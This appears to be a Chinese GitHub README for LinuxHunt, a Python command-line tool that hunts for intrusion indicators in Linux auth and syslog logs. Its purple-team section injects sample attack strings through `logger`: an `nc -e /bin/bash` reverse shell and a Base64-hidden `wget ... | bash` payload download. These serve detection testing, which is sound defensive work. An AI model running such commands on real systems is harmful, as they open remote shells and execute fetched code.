Spellskite-coding/LinuxHunt

GitHub: Spellskite-coding/LinuxHunt

LinuxHunt 是一款零依赖的 Linux 安全日志威胁狩猎命令行工具,帮助安全团队在 Debian/Ubuntu 环境中快速检测恶意行为和入侵指标。

Stars: 0 | Forks: 0

# 🕵️‍♂️ LinuxHunt **LinuxHunt** 是一款轻量级、无依赖的命令行 Threat Hunting 工具,专为快速分析现代 Linux 系统(Debian、Ubuntu 等)上的安全日志而设计。 作为 Linux 环境下 *DeepBlueCLI* 的替代方案,这款完全使用 Python 3 标准库开发的工具,旨在帮助 SOC 分析师、事件响应团队(DFIR)和 Purple Teams 无需部署复杂的 agent 即可快速识别妥协指标(IoC)。 ## ✨ 主要功能 * **零依赖:** 不需要任何外部模块(无需 `pip install`)。非常适合受限或隔离环境。 * **集成 `systemd-journald`:** 通过 `journalctl` 直接查询日志,并支持动态时间管理(`--since`)。 * **安全性与健壮性:** * 自动清理 ANSI 转义序列,以防止日志伪造(Log Forging / Terminal Injection)攻击。 * 对用户输入进行严格验证,以防止命令注入。 * 预编译正则表达式,并在遭受大规模攻击时提供防 OOM(Out-Of-Memory)保护。 * **自动化检测:** * **`auth` 模块:** 检测 SSH/PAM 暴力破解、新用户创建,以及通过 `sudo` 或 `su` 执行的可疑命令。 * **`syslog` 模块:** 检测反取证行为(清除历史记录)、reverse shell、可疑下载(`wget`/`curl`),以及实时解码 Base64 编码的恶意 payload。 ## 🚀 安装 只需克隆此仓库并运行脚本即可: git clone [https://github.com/Spellskite-coding/LinuxHunt](https://github.com/Spellskite-coding/LinuxHunt) cd LinuxHunt ## 🛠️ 使用方法 该工具需要 elevated 权限(sudo)才能访问系统的安全日志。 - 基本语法: sudo python3 linuxhunt.py -j -t -s "" ## 分析示例 - 分析过去 24 小时内的身份验证尝试: sudo python3 linuxhunt.py -j -t auth -s "24 hours ago" - 追踪当天可疑的命令或 payload 执行情况: sudo python3 linuxhunt.py -j -t syslog -s "today" - 分析旧的静态日志文件(离线模式): sudo python3 linuxhunt.py -f /var/log/auth.log.1 -t auth ## 🎯 Purple Teaming:模拟攻击以测试工具 您可以使用 logger 命令向系统日志中注入虚假痕迹,以此来测试检测规则的有效性。 - 模拟反取证(清除痕迹): logger "user root attempted track covering: history -c" - 模拟 Reverse Shell: logger "type=EXECVE COMMAND=nc -e /bin/bash 10.0.0.0 4444" - 模拟执行 Base64 隐藏的 payload: logger "type=EXECVE COMMAND=echo d2dldCBodHRwOi8vc2FmZWJsdWVjb25zZWlsLmZyL3BheWxvYWQuc2g= | base64 -d | bash" # 然后对过去 5 分钟的内容运行检测: sudo python3 linuxhunt.py -j -t syslog -s "5 minutes ago" 祝您调查顺利! :)
标签:CSV导出, PB级数据处理, Python, 子域名变形, 安全运维, 无后门